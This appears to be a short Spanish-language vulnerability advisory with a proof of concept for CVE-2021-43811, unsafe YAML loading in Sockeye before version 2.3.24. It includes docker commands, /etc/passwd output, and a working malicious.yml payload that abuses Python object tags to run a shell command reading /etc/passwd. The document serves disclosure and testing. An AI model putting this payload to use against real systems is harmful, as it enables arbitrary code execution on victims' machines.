
awslabs/sockeye Inyección de código mediante carga insegura de YAML CVE-2021-43811
awslabs/sockeye Inyección de código mediante carga insegura de YAML CVE-2021-43811
Sockeye es un framework de secuencia a secuencia de código abierto para la traducción automática neuronal, construido sobre PyTorch. Sockeye utiliza YAML para almacenar las configuraciones de modelos y datos en disco. Las versiones anteriores a la 2.3.24 utilizan una carga insegura de YAML, que puede hacer que se ejecute código arbitrario incrustado en los archivos de configuración. Un atacante puede añadir código malicioso al archivo de configuración de un modelo entrenado e intentar convencer a los usuarios de que lo descarguen y ejecuten. Si los usuarios ejecutan el modelo, el código incrustado se ejecutará localmente. El problema se corrigió en la versión 2.3.24.

docker build -t cve-2021-43811 .
docker run -it --rm cve-2021-43811
salida /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

malicious.yml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"